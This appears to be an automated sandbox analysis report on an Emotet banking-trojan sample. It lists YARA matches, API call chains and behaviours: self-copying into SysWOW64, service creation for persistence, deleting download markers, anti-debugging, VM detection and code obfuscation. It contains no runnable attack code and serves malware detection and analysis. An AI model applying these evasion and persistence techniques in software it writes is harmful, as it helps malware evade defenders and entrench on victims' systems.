Source: C:\Windows\SysWOW64\driverthunk.exe; Code function: 4_2_006430E4
Source: C:\Windows\SysWOW64\driverthunk.exe; Code function: 4_2_006430E8
Source: C:\Windows\SysWOW64\driverthunk.exe; Code function: 4_2_006428C1
Source: C:\Windows\SysWOW64\driverthunk.exe; Code function: 4_2_00F537A5
Source: C:\Windows\SysWOW64\driverthunk.exe; Code function: 4_2_00F537A9
Source: C:\Windows\SysWOW64\driverthunk.exe; Code function: 4_2_00F52F82
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: String function: 00401220 appears 36 times
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: String function: 00403520 appears 70 times
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: String function: 0043B240 appears 194 times
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: String function: 00409714 appears 58 times
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: String function: 0043AFA9 appears 72 times
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: String function: 00442074 appears 44 times
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: String function: 0045255A appears 38 times
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: String function: 004093F0 appears 32 times
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: String function: 00449972 appears 92 times
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: String function: 0043AF40 appears 454 times
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: String function: 004138C5 appears 70 times
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: String function: 0043AF73 appears 54 times
Sample file is different than original file name gathered from version info
Source: 3ki05193698.exe.exe, 00000000.00000002.1999310109.0000000000489000.00000002.00020000.sdmp; Binary or memory string: OriginalFilenamefrom the White House Office of Management and Budget vs 3ki05193698.exe.exe
Source: 3ki05193698.exe.exe, 00000002.00000000.1998673040.0000000000489000.00000002.00020000.sdmp; Binary or memory string: OriginalFilenamefrom the White House Office of Management and Budget vs 3ki05193698.exe.exe
Source: 3ki05193698.exe.exe, 00000002.00000002.2032207214.00000000024B0000.00000002.00000001.sdmp; Binary or memory string: originalfilename vs 3ki05193698.exe.exe
Source: 3ki05193698.exe.exe, 00000002.00000002.2032207214.00000000024B0000.00000002.00000001.sdmp; Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 3ki05193698.exe.exe
Source: 3ki05193698.exe.exe, 00000002.00000002.2033069300.0000000002930000.00000002.00000001.sdmp; Binary or memory string: System.OriginalFileName vs 3ki05193698.exe.exe
Source: 3ki05193698.exe.exe; Binary or memory string: OriginalFilenamefrom the White House Office of Management and Budget vs 3ki05193698.exe.exe
Yara signature match
Source: 00000000.00000002.1999763726.0000000002281000.00000020.00000001.sdmp, type: MEMORY; Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000002.00000002.2031798136.00000000005F0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000000.00000002.1999620941.0000000000740000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000004.00000002.2792994904.0000000000640000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000003.00000002.2029903542.0000000000601000.00000020.00000001.sdmp, type: MEMORY; Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000003.00000002.2029828683.00000000004A0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000004.00000002.2793212106.0000000000F51000.00000020.00000001.sdmp, type: MEMORY; Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000002.00000002.2031865725.00000000006A1000.00000020.00000001.sdmp, type: MEMORY; Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Classification label
Source: classification engine; Classification label: mal100.bank.troj.evad.winEXE@6/0@0/1
Contains functionality to create services
Source: C:\Windows\SysWOW64\driverthunk.exe; Code function: OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,4_2_00F5E4A8
Contains functionality to enum processes or threads
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_02281943 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_02281943
Contains functionality to instantiate COM classes
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_00423866 __EH_prolog3_GS,_memset,GetVersionExA,_malloc,_memset,CoInitializeEx,CoCreateInstance,0_2_00423866
Contains functionality to load and extract PE file embedded resources
Source: C:\Users\user\Desktop\3ki05193698.exe.exe; Code function: 0_2_004060CC __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z,__EH_prolog3_catch,FindResourceA,LoadResource,LockResource,GetDesktopWindow,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow,FreeResource,0_2_004060CC
Contains functionality to modify services (start/stop/modify)
Source: C:\Windows\SysWOW64\driverthunk.exe; Code function: 4_2_00F5E4A8 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,4_2_00F5E4A8
Creates mutexes
Source: C:\Windows\SysWOW64\driverthunk.exe; Mutant created: \BaseNamedObjects\Global\I41D33F40
PE file has an executable .text section and no other executable section
Source: 3ki05193698.exe.exe; Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads ini filesShow sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Sample is known by AntivirusShow sources
Source: 3ki05193698.exe.exeVirustotal: Detection: 77%
Sample requires command line parameters (based on API chain)Show sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcessgraph_0-55902
Source: C:\Windows\SysWOW64\driverthunk.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\3ki05193698.exe.exe 'C:\Users\user\Desktop\3ki05193698.exe.exe'
Source: unknownProcess created: C:\Users\user\Desktop\3ki05193698.exe.exe --97a1abae
Source: unknownProcess created: C:\Windows\SysWOW64\driverthunk.exe C:\Windows\SysWOW64\driverthunk.exe
Source: unknownProcess created: C:\Windows\SysWOW64\driverthunk.exe --4d57fc0c
Source: C:\Users\user\Desktop\3ki05193698.exe.exeProcess created: C:\Users\user\Desktop\3ki05193698.exe.exe --97a1abaeJump to behavior
Source: C:\Windows\SysWOW64\driverthunk.exeProcess created: C:\Windows\SysWOW64\driverthunk.exe --4d57fc0cJump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
PE file contains a debug data directoryShow sources
Source: 3ki05193698.exe.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Binary contains paths to debug symbolsShow sources
Source: Binary string: c:\Users\User\Desktop\2008\XFontDialog_demo\vs6\Release\XFontDialogTest.pdb source: 3ki05193698.exe.exe
Source: Binary string: c:\Users\User\Desktop\2008\XFontDialog_demo\vs6\Release\XFontDialogTest.pdb H0mG source: 3ki05193698.exe.exe

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 0_2_0045A702 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_0045A702
PE file contains an invalid checksum
Source: 3ki05193698.exe.exe | Static PE information: real checksum: 0xa5dce should be: 0xa5f77
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 0_2_0040C4CB push edi; ret 0_2_0040C4CC
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 0_2_0040C4D3 push ds; ret 0_2_0040C4D4
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 0_2_0040C4E7 push edi; ret 0_2_0040C4E8
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 0_2_0043B018 push ecx; ret 0_2_0043B02B
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 0_2_0043B285 push ecx; ret 0_2_0043B298
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 2_2_0040C4CB push edi; ret 2_2_0040C4CC
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 2_2_0040C4D3 push ds; ret 2_2_0040C4D4
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 2_2_0040C4E7 push edi; ret 2_2_0040C4E8
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 2_2_0043B018 push ecx; ret 2_2_0043B02B
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 2_2_0043B285 push ecx; ret 2_2_0043B298

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\SysWOW64\driverthunk.exe | Executable created and started: C:\Windows\SysWOW64\driverthunk.exe
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | PE file moved: C:\Windows\SysWOW64\driverthunk.exe

Boot Survival:

Contains functionality to start windows services
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 4_2_00F5E4A8 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,4_2_00F5E4A8

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | File opened: C:\Windows\SysWOW64\driverthunk.exe:Zone.Identifier read attributes | delete
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 0_2_00406670 IsIconic,GetWindowPlacement,GetWindowRect,0_2_00406670
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 0_2_0042EAB8 IsWindowVisible,IsIconic,0_2_0042EAB8
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 0_2_00403100 IsIconic,0_2_00403100
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 0_2_00403300 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,0_2_00403300
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 0_2_00427655 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z,__EH_prolog3,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,0_2_00427655
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 2_2_00406670 IsIconic,GetWindowPlacement,GetWindowRect,2_2_00406670
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 2_2_0042EAB8 IsWindowVisible,IsIconic,2_2_0042EAB8
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 2_2_00403100 IsIconic,2_2_00403100
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 2_2_00403300 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,2_2_00403300
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 2_2_00427655 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z,__EH_prolog3,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,2_2_00427655
Disables application error messages (SetErrorMode)
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\driverthunk.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\driverthunk.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\driverthunk.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\driverthunk.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\driverthunk.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\driverthunk.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking mutex)
Source: C:\Windows\SysWOW64\driverthunk.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Contains functionality to enumerate running services
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle,4_2_00F5E20C
Found evasive API chain (date check)
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | API coverage: 3.2 %
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | API coverage: 2.8 %
Source: C:\Windows\SysWOW64\driverthunk.exe | API coverage: 7.2 %
Program does not show much activity (idle)
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Checks the free space of harddrives
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | File Volume queried: C:\ FullSizeInformation
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 0_2_004305BD lstrlenA,FindFirstFileA,FindClose,0_2_004305BD
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 0_2_0042885D __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,0_2_0042885D
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 2_2_004305BD lstrlenA,FindFirstFileA,FindClose,2_2_004305BD
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 2_2_0042885D __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,2_2_0042885D
Contains functionality to query system information
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 0_2_0043E50E VirtualQuery,GetSystemInfo,GetModuleHandleW,GetProcAddress,VirtualAlloc,VirtualProtect,0_2_0043E50E
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: driverthunk.exe, 00000004.00000002.2793127886.00000000006B1000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
Program exit points
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\driverthunk.exe | API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\driverthunk.exe | API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\driverthunk.exe | API call chain: ExitProcess graph end node
Queries a list of all running processes
Source: C:\Windows\SysWOW64\driverthunk.exe | Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 0_2_00442D24 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00442D24
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 0_2_0043E50E VirtualProtect ?,-00000001,00000104,? 0_2_0043E50E
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 0_2_0045A702 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_0045A702
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 0_2_00402960 mov eax, dword ptr fs:[00000030h] 0_2_00402960
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 0_2_00740467 mov eax, dword ptr fs:[00000030h] 0_2_00740467
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 0_2_00740C0C mov eax, dword ptr fs:[00000030h] 0_2_00740C0C
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 0_2_00741743 mov eax, dword ptr fs:[00000030h] 0_2_00741743
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 0_2_022812CD mov eax, dword ptr fs:[00000030h] 0_2_022812CD
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 0_2_02281E04 mov eax, dword ptr fs:[00000030h] 0_2_02281E04
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 2_2_00402960 mov eax, dword ptr fs:[00000030h] 2_2_00402960
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 2_2_005F0467 mov eax, dword ptr fs:[00000030h] 2_2_005F0467
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 2_2_005F0C0C mov eax, dword ptr fs:[00000030h] 2_2_005F0C0C
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 2_2_005F1743 mov eax, dword ptr fs:[00000030h] 2_2_005F1743
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 3_2_00601E04 mov eax, dword ptr fs:[00000030h] 3_2_00601E04
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 3_2_006012CD mov eax, dword ptr fs:[00000030h] 3_2_006012CD
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 4_2_00640467 mov eax, dword ptr fs:[00000030h] 4_2_00640467
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 4_2_00640C0C mov eax, dword ptr fs:[00000030h] 4_2_00640C0C
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 4_2_00641743 mov eax, dword ptr fs:[00000030h] 4_2_00641743
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 4_2_00F512CD mov eax, dword ptr fs:[00000030h] 4_2_00F512CD
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 4_2_00F51E04 mov eax, dword ptr fs:[00000030h] 4_2_00F51E04
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 0_2_02282561 GetProcessHeap,RtlAllocateHeap,0_2_02282561
Program does not show much activity (idle)
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Contains functionality to register its own exception handler
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 0_2_00448BF8 SetUnhandledExceptionFilter,0_2_00448BF8
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 0_2_00442D24 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00442D24
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 0_2_0044ADDD __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0044ADDD
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 0_2_00439CC7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00439CC7
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 2_2_00448BF8 SetUnhandledExceptionFilter,2_2_00448BF8
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 2_2_00442D24 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00442D24
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 2_2_0044ADDD __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0044ADDD
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: 2_2_00439CC7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00439CC7

Language, Device and Operating System Detection:

Contains functionality to query locale information (e.g. system language)
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA,0_2_00414177
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_004565B2
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,0_2_0045872B
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,0_2_00458842
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,0_2_004588DA
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,0_2_0045894E
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,0_2_00458B20
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: _strlen,EnumSystemLocalesA,0_2_00458BE4
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,0_2_00456C53
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_00458C74
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_00458C0D
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,0_2_00458CB0
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,0_2_00456EDE
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,0_2_0045AF55
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: GetLocaleInfoW,0_2_0045AF08
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,0_2_0044AF15
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,0_2_0045AF21
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: GetLocaleInfoA,0_2_00458FB0
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_0045B094
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,0_2_004571A4
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA,2_2_00414177
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_004565B2
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,2_2_0045872B
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,2_2_00458842
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,2_2_004588DA
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,2_2_0045894E
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,2_2_00458B20
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: _strlen,EnumSystemLocalesA,2_2_00458BE4
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,2_2_00456C53
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_00458C74
Source: C:\Users\user\Desktop\3ki05193698.exe.exe | Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_00458C0D
